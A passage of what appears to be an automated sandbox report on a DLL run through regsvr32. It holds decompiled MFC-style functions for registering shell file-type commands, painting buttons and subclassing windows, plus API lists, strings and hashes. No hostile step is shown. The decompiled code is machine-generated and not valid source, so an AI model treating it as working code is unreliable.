							if( *((intOrPtr*)( *_t258 + 0x64))() == 0 ||  *((intOrPtr*)( *(_t269 - 0x14) - 8)) == 0) {
								_t264 = "ddeexec";
								_push(_t264);
								E10037011(_t269 - 0x14, "%s\\shell\\open\\%s",  *(_t269 - 0x10));
								_t272 = _t272 + 0x10;
								_t164 = E10065B07( *(_t269 - 0x14), "[open(\"%1\")]", 0);
								__eflags = _t164;
								if(_t164 == 0) {
									goto L38;
								}
								__eflags =  *((intOrPtr*)(_t269 + 8));
								if( *((intOrPtr*)(_t269 + 8)) == 0) {
									_push(" \"%1\"");
									_t242 = _t269 - 0x1c;
									goto L26;
								}
								_push(_t264);
								E10037011(_t269 - 0x14, "%s\\shell\\print\\%s",  *(_t269 - 0x10));
								_t272 = _t272 + 0x10;
								_t190 = E10065B07( *(_t269 - 0x14), "[print(\"%1\")]", 0);
								__eflags = _t190;
								if(_t190 == 0) {
									goto L38;
								}
								_push(_t264);
								E10037011(_t269 - 0x14, "%s\\shell\\printto\\%s",  *(_t269 - 0x10));
								_t272 = _t272 + 0x10;
								_t193 = E10065B07( *(_t269 - 0x14), "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", 0);
								__eflags = _t193;
								if(_t193 == 0) {
									goto L38;
								}
								_t268 = " /dde";
								E10045CFA(_t269 - 0x1c, _t268);
								E10045CFA(_t269 - 0x28, _t268);
								_push(_t268);
								goto L24;
							} else {
								E10045CFA(_t269 - 0x1c, " \"%1\"");
								if( *((intOrPtr*)(_t269 + 8)) == 0) {
									L27:
									_t265 = "command";
									_push(_t265);
									E10037011(_t269 - 0x14, "%s\\shell\\open\\%s",  *(_t269 - 0x10));
									_t272 = _t272 + 0x10;
									if(E10065B07( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x1c)), 0) == 0) {
										goto L38;
									}
									if( *((intOrPtr*)(_t269 + 8)) == 0) {
										L31:
										 *((intOrPtr*)( *_t258 + 0x64))(_t269 - 0x18, 4);
										_t171 =  *(_t269 - 0x18);
										_t290 =  *((intOrPtr*)(_t171 - 8));
										if( *((intOrPtr*)(_t171 - 8)) == 0) {
											goto L38;
										}
										 *(_t269 - 0x40) = 0x208;
										_t174 = RegQueryValueA(0x80000000, _t171, E10045D4E(_t269 - 0x14, _t269, 0x208), _t269 - 0x40);
										E10045D9D(_t269 - 0x14, _t290, 0xffffffff);
										if(_t174 != 0) {
											L35:
											if(E10065B07( *(_t269 - 0x18),  *(_t269 - 0x10), 0) != 0 &&  *((intOrPtr*)(_t269 + 8)) != 0) {
												E10037011(_t269 - 0x14, "%s\\ShellNew",  *(_t269 - 0x18));
												_t272 = _t272 + 0xc;
												E10065B07( *(_t269 - 0x14), 0x1007e778, "NullFile");
											}
											goto L38;
										}
										_t180 =  *(_t269 - 0x14);
										if( *((intOrPtr*)( *(_t269 - 0x14) - 8)) == 0 || E1001ABB8(_t180,  *(_t269 - 0x10)) == 0) {
											goto L35;
										} else {
											goto L38;
										}
									}
									_push(_t265);
									E10037011(_t269 - 0x14, "%s\\shell\\print\\%s",  *(_t269 - 0x10));
									_t272 = _t272 + 0x10;
									if(E10065B07( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x28)), 0) == 0) {
										goto L38;
									}
									_push(_t265);
									E10037011(_t269 - 0x14, "%s\\shell\\printto\\%s",  *(_t269 - 0x10));
									_t272 = _t272 + 0x10;
									if(E10065B07( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x24)), 0) == 0) {
										goto L38;
									}
									goto L31;
								}
								E10045CFA(_t269 - 0x28, " /p \"%1\"");
								_push(" /pt \"%1\" \"%2\" \"%3\" \"%4\"");
								L24:
								_t242 = _t269 - 0x24;
								L26:
								E10045CFA(_t242);
								goto L27;
							}
						}
						E10037011(_t269 - 0x14, "%s\\DefaultIcon",  *(_t269 - 0x10));
						_t272 = _t272 + 0xc;
						if(E10065B07( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x2c)), 0) == 0) {
							goto L38;
						}
						goto L15;
					}
					L38:
					 *(_t269 - 4) = 8;
					E1004591E(_t269 - 0x20);
					 *(_t269 - 4) = 7;
					E1004591E(_t269 - 0x10);
					 *(_t269 - 4) = 5;
					E1004591E(_t269 - 0x18);
					 *(_t269 - 4) = 4;
					E1004591E(_t269 - 0x2c);
					 *(_t269 - 4) = 3;
					E1004591E(_t269 - 0x24);
					 *(_t269 - 4) = 2;
					E1004591E(_t269 - 0x28);
					 *(_t269 - 4) = 1;
					E1004591E(_t269 - 0x1c);
					 *(_t269 - 0x38) =  *(_t269 - 0x38) + 1;
					if( *((intOrPtr*)(_t269 - 0x3c)) != 0) {
						_t135 =  *((intOrPtr*)(_t269 - 0x3c));
						continue;
					}
					goto L40;
				}
			}

0x10065e44
0x10065e49
0x10065e4c
0x10065e53
0x10065e55
0x10065e5a
0x10065e5d
0x10065e60
0x10065e71
0x10065e76
0x10065e79
0x10065e82
0x10066255
0x10066258
0x1006625b
0x10066260
0x10066267
0x10066271
0x10066279
0x10066279
0x10065e8e
0x10065e90
0x10065e96
0x10065e9d
0x10065ea9
0x10065ead
0x10065eb9
0x10065ebd
0x10065ec9
0x10065ecd
0x10065ed5
0x10065ed7
0x10065edc
0x10065edf
0x10065ef8
0x10065efc
0x10065f25
0x10065f2a
0x10065efe
0x10065f0a
0x10065f0f
0x10065f13
0x10065f13
0x10065f34
0x10065f3c
0x10065f40
0x10065f40
0x10065f45
0x10065f4a
0x10065f4d
0x10065f50
0x10065f58
0x10065f5a
0x10065f5d
0x10065f66
0x00000000
0x00000000
0x10065f7d
0x10065f7f
0x10065f87
0x10065f90
0x10065f90
0x10065fa3
0x10065fac
0x10065fd6
0x10065fdb
0x10065fdc
0x10065fe4
0x1006601b
0x10066023
0x1006602d
0x10066032
0x1006603e
0x10066043
0x10066045
0x00000000
0x00000000
0x1006604b
0x1006604e
0x100660c3
0x100660c8
0x00000000
0x100660c8
0x10066050
0x1006605d
0x10066062
0x1006606e
0x10066073
0x10066075
0x00000000
0x00000000
0x1006607b
0x10066088
0x1006608d
0x10066099
0x1006609e
0x100660a0
0x00000000
0x00000000
0x100660a6
0x100660af
0x100660b8
0x100660bd
0x00000000
0x10065fee
0x10065ff6
0x10065ffe
0x100660d0
0x100660d0
0x100660d8
0x100660e2
0x100660e7
0x100660f8
0x00000000
0x00000000
0x10066101
0x10066155
0x1006615f
0x10066162
0x10066165
0x10066168
0x00000000
0x00000000
0x10066179
0x1006618c
0x10066199
0x100661a0
0x100661b9
0x100661c7
0x100661da
0x100661df
0x100661ef
0x100661ef
0x00000000
0x100661c7
0x100661a2
0x100661a8
0x00000000
0x00000000
0x00000000
0x00000000
0x100661a8
0x10066103
0x10066110
0x10066115
0x10066126
0x00000000
0x00000000
0x1006612c
0x10066139
0x1006613e
0x1006614f
0x00000000
0x00000000
0x00000000
0x1006614f
0x1006600c
0x10066011
0x100660be
0x100660be
0x100660cb
0x100660cb
0x00000000
0x100660cb
0x10065fe4
0x10065fba
0x10065fbf
0x10065fd0
0x00000000
0x00000000
0x00000000
0x10065fd0
0x100661f4
0x100661f7
0x100661fb
0x10066203
0x10066207
0x1006620f
0x10066213
0x1006621b
0x1006621f
0x10066227
0x1006622b
0x10066233
0x10066237
0x1006623f
0x10066243
0x10066248
0x1006624e
0x10065e8b
0x00000000
0x10065e8b
0x00000000
0x10066254

APIs

__EH_prolog.LIBCMT ref: 10065E44

Part of subcall function 10048C6C: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10048C86
Part of subcall function 10048C6C: GetShortPathNameA.KERNEL32 ref: 10048C9E

Part of subcall function 10045693: InterlockedIncrement.KERNEL32(?), ref: 100456A8

ExtractIconA.SHELL32(?,?,00000001), ref: 10065EF2
DestroyIcon.USER32(00000000), ref: 10065F13

Part of subcall function 10045D9D: lstrlenA.KERNEL32(?,?,10037008,000000FF), ref: 10045DB0

RegQueryValueA.ADVAPI32(80000000,?,00000000,00000208), ref: 1006618C

Strings

%s\shell\open\%s, xrefs: 10066027, 100660DC
/dde, xrefs: 100660A6, 100660AE, 100660B4, 100660BD
%s\shell\printto\%s, xrefs: 10066082, 10066133
[open("%1")], xrefs: 10066036
%s\ShellNew, xrefs: 100661D4
/p "%1", xrefs: 10066004
command, xrefs: 100660D0, 100660D8, 10066103, 1006612C
"%1", xrefs: 10065FEE, 100660C3
[printto("%1","%2","%3","%4")], xrefs: 10066091
/pt "%1" "%2" "%3" "%4", xrefs: 10066011
[print("%1")], xrefs: 10066066
%s\shell\print\%s, xrefs: 10066057, 1006610A
NullFile, xrefs: 100661E2
ddeexec, xrefs: 1006601B, 10066023, 10066050, 1006607B
%s\DefaultIcon, xrefs: 10065FB4
,%d, xrefs: 10065F04, 10065F1F

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: IconName$DestroyExtractFileH_prologIncrementInterlockedModulePathQueryShortValuelstrlen
String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
API String ID: 1041107710-4043335175
Opcode ID: d367ce915d2e87784259c6b3887fb6b5d5239fb37c4d7ab96d9edc2c71fc7454
Instruction ID: fd36fb2b8e9e92e25714c971aa3b3278a305b8168177ef571e8ceb1164c14cf4
Opcode Fuzzy Hash: d367ce915d2e87784259c6b3887fb6b5d5239fb37c4d7ab96d9edc2c71fc7454
Instruction Fuzzy Hash: 4DD15675C0015AEEDF04DBE4CD85AEEBBBAEF08341F244469F505B6192EB35AE04CB21

Uniqueness

Uniqueness Score: -1.00%

Function 1002CB00 Relevance: 30.2, APIs: 20, Instructions: 246
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E1002CB00(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v64;
				long _v72;
				signed int _v76;
				signed int _t34;
				int _t69;
				struct HWND__* _t71;
				signed int _t73;

				_t69 = _a8;
				_t82 = _t69 - 0x82;
				if(_t69 != 0x82) {
					_t71 = _a4;
					__eflags = GetPropA(_t71, 0);
					if(__eflags == 0) {
						__eflags = _t69 - 0xf1;
						_t34 = _t69;
						if(__eflags > 0) {
							__eflags = _t34 - 0xf3;
							if(_t34 == 0xf3) {
								goto L28;
							} else {
								__eflags = _t34 - 0x1943;
								if(__eflags < 0) {
									goto L11;
								} else {
									__eflags = _t34 - 0x1944;
									if(__eflags <= 0) {
										 *_a16 = 1;
										return 0x3e8;
									} else {
										goto L11;
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L28:
								_t73 = 4;
								goto L29;
							} else {
								_t34 = _t34 - 7;
								__eflags = _t34 - 8;
								if(__eflags > 0) {
									L11:
									return CallWindowProcA(E1002A360(__eflags, _t71, 0), _t71, _t69, _a12, _a16);
								} else {
									switch( *((intOrPtr*)(_t34 * 4 +  &M1002CDB0))) {
										case 0:
											__ebp = 0x16;
											goto L29;
										case 1:
											__eax = GetWindowLongA(__esi, 0xfffffff0);
											__al = __al & 0x0000001f;
											__eflags = __al - 9;
											if(__al == 9) {
												__eax = SendMessageA(__esi, 0xf3, 0, 0);
											}
											__ebp = 0;
											goto L29;
										case 2:
											goto L11;
										case 3:
											__ebp = 6;
											goto L29;
										case 4:
											__eax = GetWindowLongA(__esi, 0xfffffff0);
											__eflags = __eax & 0x10000000;
											if((__eax & 0x10000000) == 0) {
												L20:
												__ebp = 0x16;
											} else {
												__al = __al & 0x0000001f;
												__eflags = __al - 7;
												if(__al != 7) {
													goto L20;
												} else {
													__ebp = 0x22;
												}
											}
											L29:
											_v72 = SendMessageA(_t71, 0xf2, 0, 0);
											_t36 = GetWindowLongA(_t71, 0xfffffff0);
											__eflags = _t36 & 0x10000000;
											if(__eflags == 0) {
												goto L11;
											} else {
												__eflags = _t69 - 7;
												if(__eflags != 0) {
													_t52 = _t36 & 0xefffffff;
													__eflags = _t52;
													SetWindowLongA(_t71, 0xfffffff0, _t52);
												}
												_v72 = CallWindowProcA(E1002A360(__eflags, _t71, 0), _t71, _t69, _a12, _a16);
												__eflags = _t69 - 7;
												if(_t69 != 7) {
													_t50 = GetWindowLongA(_t71, 0xfffffff0) | 0x10000000;
													__eflags = _t50;
													SetWindowLongA(_t71, 0xfffffff0, _t50);
												}
												_t63 = SendMessageA(_t71, 0xf2, 0, 0);
												__eflags = _t69 - 0xf3;
												if(_t69 == 0xf3) {
													L36:
													__eflags = _t63 - _v76;
													if(_t63 != _v76) {
														goto L37;
													}
												} else {
													__eflags = _t69 - 0xf1;
													if(_t69 != 0xf1) {
														L37:
														_t70 = GetDC(_t71);
														__eflags = _t70;
														if(_t70 != 0) {
															_t64 = _t63 ^ _v76;
															__eflags = _t64 & 0x00000003;
															if((_t64 & 0x00000003) != 0) {
																_t73 = _t73 | 0x00000004;
																__eflags = _t73;
															}
															_t66 = _t64 & 0x00000008 | _t73;
															__eflags = _t66;
															ExcludeUpdateRgn(_t70, _t71);
															_push(_t66);
															E1002C5B0(_t71, _t70);
															ReleaseDC(_t71, _t70);
														}
													} else {
														goto L36;
													}
												}
												return _v72;
											}
											goto L43;
										case 5:
											__edi = SendMessageA(__esi, 0xf2, 0, 0);
											__ebx = _a12;
											__ebp = __ebx;
											__eflags = __ebp;
											if(__ebp == 0) {
												__eax =  &_v64;
												__ebp = BeginPaint;
												__ebp = BeginPaint(__esi,  &_v64);
											}
											__eax = GetWindowLongA(__esi, 0xfffffff0);
											__eflags = __eax & 0x10000000;
											if((__eax & 0x10000000) != 0) {
												__edi = __edi & 0x00000008;
												__edi = __edi | 0x00000006;
												__eflags = __edi;
												_push(__edi);
												__eax = E1002C5B0(__esi, __ebp);
											}
											__eflags = __ebx;
											if(__ebx == 0) {
												 &_v64 = EndPaint(__esi,  &_v64);
											}
											__eax = 0;
											__eflags = 0;
											return 0;
											goto L43;
									}
								}
							}
						}
					} else {
						return CallWindowProcA(E1002A360(__eflags, _t71, 0), _t71, _t69, _a12, _a16);
					}
				} else {
					return E1002A590(_t82, _a4, _t69, _a12, _a16, 0);
				}
				L43:
			}

0x1002cb07
0x1002cb0b
0x1002cb11
0x1002cb39
0x1002cb4b
0x1002cb4d
0x1002cb79
0x1002cb7f
0x1002cb81
0x1002cb98
0x1002cb9d
0x00000000
0x1002cba3
0x1002cba3
0x1002cba8
0x00000000
0x1002cbaa
0x1002cbaa
0x1002cbaf
0x1002cd9d
0x1002cdab
0x00000000
0x00000000
0x00000000
0x1002cbaf
0x1002cba8
0x1002cb83
0x1002cb83
0x1002cca6
0x1002cca6
0x00000000
0x1002cb89
0x1002cb89
0x1002cb8c
0x1002cb8f
0x1002cbb5
0x1002cbdc
0x1002cb91
0x1002cb91
0x00000000
0x1002cbdf
0x00000000
0x00000000
0x1002cbec
0x1002cbf2
0x1002cbf4
0x1002cbf6
0x1002cc02
0x1002cc02
0x1002cc08
0x00000000
0x00000000
0x00000000
0x00000000
0x1002cc0f
0x00000000
0x00000000
0x1002cc1c
0x1002cc22
0x1002cc27
0x1002cc36
0x1002cc36
0x1002cc29
0x1002cc29
0x1002cc2b
0x1002cc2d
0x00000000
0x1002cc2f
0x1002cc2f
0x1002cc2f
0x1002cc2d
0x1002ccab
0x1002ccbb
0x1002ccc2
0x1002ccc8
0x1002cccd
0x00000000
0x1002ccd3
0x1002ccd3
0x1002ccd6
0x1002ccd8
0x1002ccd8
0x1002cce1
0x1002cce1
0x1002cd05
0x1002cd09
0x1002cd0c
0x1002cd17
0x1002cd17
0x1002cd20
0x1002cd20
0x1002cd36
0x1002cd38
0x1002cd3e
0x1002cd48
0x1002cd48
0x1002cd4c
0x00000000
0x00000000
0x1002cd40
0x1002cd40
0x1002cd46
0x1002cd4e
0x1002cd55
0x1002cd57
0x1002cd59
0x1002cd5b
0x1002cd5f
0x1002cd62
0x1002cd64
0x1002cd64
0x1002cd64
0x1002cd6c
0x1002cd6c
0x1002cd6e
0x1002cd74
0x1002cd77
0x1002cd81
0x1002cd81
0x00000000
0x00000000
0x00000000
0x1002cd46
0x1002cd92
0x1002cd92
0x00000000
0x00000000
0x1002cc4d
0x1002cc4f
0x1002cc53
0x1002cc55
0x1002cc57
0x1002cc59
0x1002cc5d
0x1002cc67
0x1002cc67
0x1002cc6c
0x1002cc72
0x1002cc77
0x1002cc79
0x1002cc7c
0x1002cc7c
0x1002cc7f
0x1002cc82
0x1002cc87
0x1002cc8a
0x1002cc8c
0x1002cc94
0x1002cc94
0x1002cc9a
0x1002cc9a
0x1002cca3
0x00000000
0x00000000
0x1002cb91
0x1002cb8f
0x1002cb83
0x1002cb4f
0x1002cb76
0x1002cb76
0x1002cb13
0x1002cb34
0x1002cb34
0x00000000

APIs

GetPropA.USER32(?,00000000), ref: 1002CB45
CallWindowProcA.USER32(00000000), ref: 1002CB6D

Part of subcall function 1002A590: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 1002A5B6
Part of subcall function 1002A590: RemovePropA.USER32(?,00000000), ref: 1002A5CE
Part of subcall function 1002A590: RemovePropA.USER32(?,00000000), ref: 1002A5DA

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 477384e5333ecdb363637dedf2f31e458e4dfbeeb5197d62cc0516c204989f52
Instruction ID: 2c1694e1ab3d23958faa42d372e4e7f50f9bd697a62e3adfddae01cbbcfde7bb
Opcode Fuzzy Hash: 477384e5333ecdb363637dedf2f31e458e4dfbeeb5197d62cc0516c204989f52
Instruction Fuzzy Hash: 41613C766407296BF211DB98EC85F9F379CFB863A1F500522FA05832D1DB256D4183B6

Uniqueness

Uniqueness Score: -1.00%

Function 10042235 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 170
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10042235(void* __edx, void* _a4, int _a8, long _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				void* __ebp;
				intOrPtr _t50;
				signed int _t52;
				long _t53;
				long _t62;
				long _t70;
				char _t71;
				long _t73;
				CHAR* _t76;
				int _t83;
				signed char _t92;
				void* _t93;
				void* _t95;
				long _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				intOrPtr _t102;
				CHAR* _t104;
				long _t105;

				_t93 = __edx;
				_t50 = E100655E1(0x10094918, E10062AFA);
				_v8 = _t50;
				if(_a4 != 3) {
					return CallNextHookEx( *(_t50 + 0x2c), _a4, _a8, _a12);
				}
				_t101 =  *((intOrPtr*)(_t50 + 0x14));
				_t95 =  *_a12;
				_t52 =  *(E10064B8B() + 0x14) & 0x000000ff;
				_t83 = _a8;
				_v12 = _t52;
				if(_t101 != 0 || ( *(_t95 + 0x23) & 0x00000040) == 0 && _t52 == 0) {
					if( *0x10094e84 == 0) {
						L10:
						if(_t101 == 0) {
							_t53 = GetWindowLongA(_t83, 0xfffffffc);
							_a4 = _t53;
							if(_t53 != 0) {
								_t104 = "AfxOldWndProc423";
								if(GetPropA(_t83, _t104) == 0) {
									SetPropA(_t83, _t104, _a4);
									if(GetPropA(_t83, _t104) == _a4) {
										GlobalAddAtomA(_t104);
										_t62 = E100421B9;
										if( *((intOrPtr*)(_v8 + 0x28)) == 0) {
											_t62 = E1004205A;
										}
										SetWindowLongA(_t83, 0xfffffffc, _t62);
									}
								}
							}
							goto L27;
						}
						E10041FBD(_t101, _t83);
						 *((intOrPtr*)( *_t101 + 0x50))();
						_a8 =  *((intOrPtr*)( *_t101 + 0x80))();
						if( *0x10094b74 != 0 || _v12 != 0) {
							L18:
							_t105 = E10042054();
							_t70 = SetWindowLongA(_t83, 0xfffffffc, _t105);
							if(_t70 == _t105) {
								goto L20;
							}
							goto L19;
						} else {
							_t99 =  *0x10094e80; // 0x0
							if(_t99 == 0 ||  *((intOrPtr*)(_t99 + 0x20)) == 0) {
								goto L18;
							} else {
								_push(0);
								_push(0);
								_push(0x36f);
								_push(_t83);
								_push(_t101);
								_t71 = E10041DB7(_t93);
								_v20 = _t71;
								if(_t71 == 0) {
									goto L18;
								}
								_a4 = E10042054();
								_t73 = GetWindowLongA(_t83, 0xfffffffc);
								asm("sbb esi, esi");
								 *((intOrPtr*)(_t99 + 0x20))(_t83, _v20);
								if( ~(_t73 - _a4) + 1 != 0) {
									L20:
									_t102 = _v8;
									 *(_t102 + 0x14) =  *(_t102 + 0x14) & 0x00000000;
									goto L28;
								}
								_t70 = SetWindowLongA(_t83, 0xfffffffc, _a4);
								L19:
								 *_a8 = _t70;
								goto L20;
							}
						}
					}
					if((GetClassLongA(_t83, 0xffffffe6) & 0x00010000) != 0) {
						goto L27;
					}
					_t76 =  *(_t95 + 0x28);
					_t92 = _t76 >> 0x10;
					if(_t92 == 0) {
						_v20 = _v20 & _t92;
						GlobalGetAtomNameA( *(_t95 + 0x28),  &_v20, 5);
						_t76 =  &_v20;
					}
					if(lstrcmpiA(_t76, ?str?) == 0) {
						goto L27;
					} else {
						goto L10;
					}
				} else {
					L27:
					_t102 = _v8;
					L28:
					_t96 = CallNextHookEx( *(_t102 + 0x2c), 3, _t83, _a12);
					if(_v12 != 0) {
						UnhookWindowsHookEx( *(_t102 + 0x2c));
						 *(_t102 + 0x2c) =  *(_t102 + 0x2c) & 0x00000000;
					}
					return _t96;
				}
			}

0x10042235
0x10042245
0x1004224e
0x10042251
0x00000000
0x1004225f
0x1004226f
0x10042273
0x1004227a
0x1004227e
0x10042281
0x10042286
0x100422a1
0x100422ef
0x100422f1
0x100423a3
0x100423ab
0x100423ae
0x100423b6
0x100423c1
0x100423c8
0x100423d5
0x100423d8
0x100423e5
0x100423ea
0x100423ec
0x100423ec
0x100423f5
0x100423f5
0x100423d5
0x100423c1
0x00000000
0x100423ae
0x100422fa
0x10042303
0x10042317
0x1004231a
0x1004237d
0x10042382
0x10042388
0x10042390
0x00000000
0x00000000
0x00000000
0x10042322
0x10042322
0x1004232a
0x00000000
0x10042332
0x10042332
0x10042334
0x10042336
0x1004233b
0x1004233c
0x1004233d
0x10042344
0x10042347
0x00000000
0x00000000
0x10042351
0x10042354
0x10042365
0x10042368
0x1004236d
0x10042397
0x10042397
0x1004239a
0x00000000
0x1004239a
0x10042375
0x10042392
0x10042395
0x00000000
0x10042395
0x1004232a
0x1004231a
0x100422b1
0x00000000
0x00000000
0x100422b7
0x100422bc
0x100422c2
0x100422c4
0x100422d2
0x100422d8
0x100422d8
0x100422e9
0x00000000
0x00000000
0x00000000
0x00000000
0x100423fb
0x100423fb
0x100423fb
0x100423fe
0x10042411
0x10042413
0x10042418
0x1004241e
0x1004241e
0x00000000
0x10042426

APIs

Part of subcall function 100655E1: TlsGetValue.KERNEL32 ref: 10065620

CallNextHookEx.USER32 ref: 1004225F
GetClassLongA.USER32(?,000000E6), ref: 100422A6
GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 100422D2
lstrcmpiA.KERNEL32(?,ime,?,?,?,10062AFA), ref: 100422E1
GetWindowLongA.USER32(?,000000FC), ref: 10042354
SetWindowLongA.USER32(?,000000FC,00000000), ref: 10042375

Strings

ime, xrefs: 100422DB
AfxOldWndProc423, xrefs: 100423B6, 100423BB, 100423C6, 100423CE, 100423D7

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

